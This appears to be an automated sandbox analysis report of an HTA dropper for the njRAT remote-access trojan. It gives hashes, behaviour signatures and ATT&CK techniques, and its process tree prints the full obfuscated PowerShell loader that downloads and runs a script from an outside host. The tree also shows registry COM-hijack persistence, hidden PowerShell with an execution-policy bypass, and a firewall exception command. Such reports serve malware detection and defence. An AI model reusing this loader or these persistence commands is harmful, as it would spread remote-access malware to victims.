Analysis

  • max time kernel
    150s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2022 19:13

General

  • Target

    enc3.hta

  • Size

    4KB

  • MD5

    586ddb57373ee157da834b1c83da00af

  • SHA1

    d240d7266f86bc74817fc45556d0d4cae4424efc

  • SHA256

    06769b16f5a4d86ab1c87f7811b6ed4964814cb469e01321c888dab9a2bf5696

  • SHA512

    467b362ba0feed6b6a15ce2ff767bf2e2503640f05369beba98b6dd67709a632f23b0186f7c21ecd330fd4911c19a68a6fe8e51649a7a983426fd1f2222a6b0e

Malware Config

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
      PID:1784
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@[email protected]_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"
          3⤵
            PID:3800
      • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
        POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
        1⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5068
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
            3⤵
            • Modifies registry class
            • Modifies registry key
            PID:5052
          • C:\Windows\system32\cmd.exe
            cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:860
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
            3⤵
            • Registers COM server for autorun
            • Modifies registry class
            • Modifies registry key
            PID:4528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1400
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
            3⤵
            • Modifies Windows Firewall
            PID:2976

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1
        Filesize

        604KB

        MD5

        ab1fce3ab2f6f211da8f8dc30c2b3060

        SHA1

        ae0dff660b20f9209a66029d44b048a63cc80336

        SHA256

        7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

        SHA512

        ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
        Filesize

        706B

        MD5

        1a2189e850187ca0cfadf5eba71bf87b

        SHA1

        022de59e2f7a4ada62a34c701d35a8f6b738a140

        SHA256

        d19e4c732fd1125438cb1d7e2278d9420fad7d3e66fcc6c56879258364664997

        SHA512

        9acf6053091a18388b9da45ea7147b71bbeb3acda7697d311ce9a416578595427ec3661a41c09abed75ae155d11c15b3573883effa25eeb86cfbf93eb515d49d

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1
        Filesize

        3KB

        MD5

        1fe311d146874fa10f4eedf9941dabd4

        SHA1

        4ea8f6f1fcc57a1cba5b388e11df6c3a58fc9709

        SHA256

        804d3783e70a5a575eeb0e7d617186bd1f8dcbd3244a736521194948fa80ea1d

        SHA512

        7a70c224d707ff7a723daa86ded140987fbf52d38a2c1cdacc1d04c53c447b78fa5cb49843eeebf126fa95cb72b44f436581b383ebde645ab53105d5f8fc74bb

      • C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs
        Filesize

        1KB

        MD5

        8b0c7083e7b7bb3a886e13dcd0830ba9

        SHA1

        444748aad7b9289f1b371aaac955c0554ca62d17

        SHA256

        45bbe8aafd1246fa15881a63f3cb8997a35cfc3e78ba306fc5abbaf72cf2867e

        SHA512

        d23a9aa4d91231b26eca8c61a6487e9f151be19a45ce7a8bfb818ebd16803cfad219ae594cfb57263e7044e9f73d3705239267345f0e03a7e478f196938d3c89

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
        Filesize

        3KB

        MD5

        00e7da020005370a518c26d5deb40691

        SHA1

        389b34fdb01997f1de74a5a2be0ff656280c0432

        SHA256

        a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

        SHA512

        9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        0ab03b4ab0ee8273a1eea28cef1ca1e7

        SHA1

        8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

        SHA256

        695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

        SHA512

        7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        bc34f67b09ef76be9c393b6fb6508a35

        SHA1

        7c59c76b6afb72f268e07e1c8ec7dd7f3860ebdb

        SHA256

        8d8540e29fff09fbed6d44d34adbe5c89c005a6c7b44426dce62dcdd1bd414c6

        SHA512

        4a0ffb8c01a44edd58d92473a2b1fe169dd669d4821b7bc0617f03f1b646788a7db76f4c08b447f87a54c787d49b90560e0f97bccf88019e68300d5ddeeb387f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        50a8221b93fbd2628ac460dd408a9fc1

        SHA1

        7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

        SHA256

        46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

        SHA512

        27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

      • memory/860-142-0x0000000000000000-mapping.dmp
      • memory/1140-157-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/1140-144-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/1400-156-0x00000000053A0000-0x000000000543C000-memory.dmp
        Filesize

        624KB

      • memory/1400-158-0x00000000059F0000-0x0000000005F94000-memory.dmp
        Filesize

        5.6MB

      • memory/1400-159-0x00000000054E0000-0x0000000005572000-memory.dmp
        Filesize

        584KB

      • memory/1400-152-0x000000000040BBBE-mapping.dmp
      • memory/1400-161-0x00000000059D0000-0x00000000059DA000-memory.dmp
        Filesize

        40KB

      • memory/1400-151-0x0000000000400000-0x0000000000410000-memory.dmp
        Filesize

        64KB

      • memory/1400-162-0x0000000006240000-0x00000000062A6000-memory.dmp
        Filesize

        408KB

      • memory/2412-154-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/2412-146-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/2412-143-0x0000000000000000-mapping.dmp
      • memory/2976-160-0x0000000000000000-mapping.dmp
      • memory/3800-136-0x0000000000000000-mapping.dmp
      • memory/4036-147-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4036-133-0x0000000000000000-mapping.dmp
      • memory/4036-135-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4528-141-0x0000000000000000-mapping.dmp
      • memory/4576-130-0x000001EC78BD0000-0x000001EC78BF2000-memory.dmp
        Filesize

        136KB

      • memory/4576-150-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4576-132-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/4576-131-0x00007FFE44CC0000-0x00007FFE45781000-memory.dmp
        Filesize

        10.8MB

      • memory/5052-140-0x0000000000000000-mapping.dmp
      • memory/5068-138-0x0000000000000000-mapping.dmp